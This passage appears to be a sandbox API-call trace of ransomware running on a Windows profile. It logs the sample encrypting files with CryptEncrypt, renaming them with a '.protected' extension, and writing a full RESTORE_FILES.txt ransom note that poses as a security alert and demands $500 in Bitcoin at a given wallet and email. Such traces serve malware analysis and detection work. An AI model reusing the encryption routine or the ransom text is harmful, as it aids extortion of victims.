pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0091.976] StrStrIW (lpFirst="Windows Live Spaces.url", lpSrch=".protected") returned 0x0 [0091.976] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="RESTORE_FILES.txt") returned 1 [0091.976] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.976] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0091.978] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".txt") returned 0x0 [0091.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0091.978] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".rar") returned 0x0 [0091.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0091.978] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".zip") returned 0x0 [0091.979] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.979] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.979] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.980] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.980] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.980] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.980] CloseHandle (hObject=0xd4) returned 1 [0091.981] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.protected") returned 90 [0091.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.protected")) returned 1 [0091.981] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.981] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.981] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\RESTORE_FILES.txt") returned 74 [0091.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.982] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.982] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.982] lstrlenA (lpString="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") returned 684 [0091.982] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.983] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.983] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.983] CloseHandle (hObject=0xb4) returned 1 [0091.983] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.983] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.983] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\RESTORE_FILES.txt") returned 61 [0091.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.984] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.984] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.991] lstrlenA (lpString="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") returned 684 [0091.991] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.991] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.991] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0091.991] CloseHandle (hObject=0xa4) returned 1 [0091.992] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.992] lstrcmpiW (lpString1="Links", lpString2="Windows") returned -1 [0091.992] lstrcmpiW (lpString1="Links", lpString2="Program Files") returned -1 [0091.992] lstrcmpiW (lpString1="Links", lpString2="Program Files (x86)") returned -1 [0091.992] lstrcmpiW (lpString1="Links", lpString2="$Recycle.bin") returned 1 [0091.992] lstrcmpiW (lpString1="Links", lpString2="System Volume Information") returned -1 [0091.992] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned 39 [0091.992] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0091.992] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0091.992] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*") returned 41 [0091.992] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.992] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.992] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.992] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.992] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.992] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.992] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\.") returned 41 [0091.992] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.992] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.992] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.992] CryptGenRandom 
(in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.992] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.992] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.992] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.992] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.992] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.992] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.992] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.992] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\..") returned 42 [0091.992] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.993] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.993] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.993] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.993] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.993] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.993] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.993] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.993] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.993] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.993] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.993] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.993] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0091.993] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.993] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.993] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.993] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0091.994] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Links\\desktop.ini") returned 51 [0091.994] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0091.994] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.994] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x244, lpOverlapped=0x0) returned 1 [0091.994] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.994] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x244, lpOverlapped=0x0) returned 1 [0091.994] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.995] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.995] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.995] CloseHandle (hObject=0xb4) returned 1 [0091.995] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.protected") returned 61 [0091.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Links\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.protected")) returned 1 [0092.038] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.038] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Windows") returned -1 [0092.038] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Program Files") returned -1 [0092.038] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Program Files (x86)") returned -1 [0092.039] lstrcmpiW (lpString1="Desktop.lnk", lpString2="$Recycle.bin") returned 1 [0092.039] lstrcmpiW (lpString1="Desktop.lnk", lpString2="System Volume Information") returned -1 [0092.039] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0092.039] StrStrIW (lpFirst="Desktop.lnk", lpSrch=".protected") returned 0x0 [0092.039] lstrcmpW (lpString1="Desktop.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0092.039] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.039] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.044] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0092.044] StrStrW (lpFirst="Desktop.lnk", lpSrch=".txt") returned 0x0 [0092.044] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0092.044] StrStrW (lpFirst="Desktop.lnk", lpSrch=".rar") 
returned 0x0 [0092.044] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0092.044] StrStrW (lpFirst="Desktop.lnk", lpSrch=".zip") returned 0x0 [0092.044] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1e6, lpOverlapped=0x0) returned 1 [0092.045] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.045] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1e6, lpOverlapped=0x0) returned 1 [0092.045] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.045] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.045] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.045] CloseHandle (hObject=0xb4) returned 1 [0092.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.protected") returned 61 [0092.045] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.protected")) returned 1 
[0092.047] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.047] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Windows") returned -1 [0092.047] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Program Files") returned -1 [0092.047] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Program Files (x86)") returned -1 [0092.047] lstrcmpiW (lpString1="Downloads.lnk", lpString2="$Recycle.bin") returned 1 [0092.047] lstrcmpiW (lpString1="Downloads.lnk", lpString2="System Volume Information") returned -1 [0092.047] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0092.047] StrStrIW (lpFirst="Downloads.lnk", lpSrch=".protected") returned 0x0 [0092.047] lstrcmpW (lpString1="Downloads.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0092.047] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.047] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0092.048] StrStrW (lpFirst="Downloads.lnk", lpSrch=".txt") returned 0x0 [0092.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0092.048] StrStrW (lpFirst="Downloads.lnk", lpSrch=".rar") returned 0x0 [0092.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Links\\Downloads.lnk") returned 53 [0092.048] StrStrW (lpFirst="Downloads.lnk", lpSrch=".zip") returned 0x0 [0092.048] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x3a1, lpOverlapped=0x0) returned 1 [0092.191] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffc5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.192] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x3a1, lpOverlapped=0x0) returned 1 [0092.192] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.192] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.192] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.192] CloseHandle (hObject=0xb4) returned 1 [0092.192] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.protected") returned 63 [0092.192] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 